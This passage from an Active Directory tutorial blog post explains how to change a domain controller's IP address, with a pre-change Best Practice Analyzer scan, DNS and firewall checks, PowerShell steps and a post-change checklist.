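You can also run the scan from PowerShell. This is a sketch; I believe the model ID below is the AD DS model, but you can confirm the exact ID on your server with Get-BpaModel.

# Run the AD DS Best Practice Analyzer scan and list anything that isn't informational
Invoke-BpaModel -ModelId "Microsoft/Windows/DirectoryServices"
Get-BpaResult -ModelId "Microsoft/Windows/DirectoryServices" |
    Where-Object { $_.Severity -ne "Information" } |
    Select-Object Severity, Title, Category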

Here is a scan from my DC2.

I’ve got a warning that the loopback address is not included on the ethernet adapter settings. The best practice is to point the preferred DNS server to another DNS server (not itself).

Here is an example of how it should be configured:

My DC2 IP address is 192.168.100.11. You can see I set the preferred DNS to another domain controller (DC1) and the alternate is set to the loopback address. This is Microsoft’s best practice.

Again, any warnings or errors the Best Practice Analyzer finds don’t mean your migration will fail. But to help avoid potential migration issues, I recommend running this tool and reviewing the scan results. It might even surface issues you weren’t aware of.

Are You Changing Subnets?

If you will be changing to a new subnet then consider the following:

  • If the server also runs DHCP you will need to update the helper address on your switch or firewall.
  • Add the new subnet to Active Directory sites and services.

Check Firewall Rules

Are there any firewall rules that will need to be updated? This could be your network firewall and Windows-based firewalls. I typically have rules on the network firewall that limit network access for critical servers like domain controllers, so I would need to update those rules to permit traffic to the new DC IP.

Plan & Schedule the IP Change

I recommend making this type of change during your maintenance window. No matter how much you prepare, there is always the potential for something to go wrong, and a maintenance window gives you time to resolve any issues. Don’t forget to communicate these changes with your team ahead of time.

How to Change the IP Address of a Domain Controller:

Here are the steps to changing the IP address on a domain controller (a PowerShell sketch of the change follows the list).

  1. Log on locally to the server (console access, don’t RDP or use remote access).
  2. Change NIC TCP/IP settings
    1. Change IP Address
    2. Change subnet mask (if required)
    3. Change Default gateway (if required)
    4. Preferred DNS server (should point to another DC in the same site)
    5. Alternate DNS server (should be the loopback address 127.0.0.1)
  3. After changing the IP, run ipconfig /flushdns to remove the local cache
  4. Run ipconfig /registerdns to ensure the new IP is registered with the DNS server
  5. Run dcdiag /fix to ensure service records are registered.
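
Here is a rough PowerShell sketch of steps 2 through 5 using this post's example addresses. The interface alias and the default gateway (192.168.100.1) are assumptions for this example; if the gateway is not changing you can omit the -DefaultGateway parameter.

# Remove the old address and add the new one (run from a console session on the DC)
Remove-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.100.11 -Confirm:$false
New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.100.15 -PrefixLength 24 -DefaultGateway 192.168.100.1

# Preferred DNS = another DC in the same site, alternate = loopback
Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses "192.168.100.10", "127.0.0.1"

# Clear the local cache, re-register DNS records, and fix service records
ipconfig /flushdns
ipconfig /registerdns
dcdiag /fix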

Video Tutorial

https://youtube.com/watch?v=4R942B54cEE

Done. Nice work!

Post Change Checklist:

  • Update DHCP scope options (DNS servers) if the DC is also a DNS server.
  • If the subnet changed, make sure AD Sites and Services is updated.
  • Update clients that use static IP addresses.
  • Update the other DCs’ NIC settings (if needed).
  • Run dcdiag and dcdiag /test:dns /v to check for issues.
  • Verify DNS is working; you can do this with nslookup (see the sketch after this checklist).
  • Test authenticating to the DC. You can do this by manually pointing a client’s DNS settings to the IP of the DC, or by using PowerShell and specifying the authentication server.
  • Continue to monitor the old IP with Wireshark. This can be done with a SPAN port or by assigning the DC’s old IP to a computer with Wireshark installed. It is useful for finding systems that are still using the old IP of the DC.
  • Update firewall rules if needed.
  • If a client system is having issues, try flushing its local DNS cache with the ipconfig /flushdns command.
  • Changing the IP address on the DC should not affect any shares on the server as long as DNS is updated.
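
For the DNS and authentication checks, a short sketch is below. Replace the domain and host names with your own; Resolve-DnsName and nltest are both built in.

# Confirm the DC's A record and the domain SRV records resolve to the new IP
Resolve-DnsName "DC2.yourdomain.local" -Type A
Resolve-DnsName "_ldap._tcp.dc._msdcs.yourdomain.local" -Type SRV

# Confirm a domain controller can be located for authentication
nltest /dsgetdc:yourdomain.local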

Summary

In this post, I showed you how to change the IP address on a domain controller, along with the checklist I go through before changing it. Authentication, DNS, and DHCP services are critical, so it’s very important to plan and review as much as you can before making changes to them. Also, all organizations and networks are different, so over time you may develop a different checklist than mine.



Source:
https://activedirectorypro.com/change-ip-address-on-domain-controller/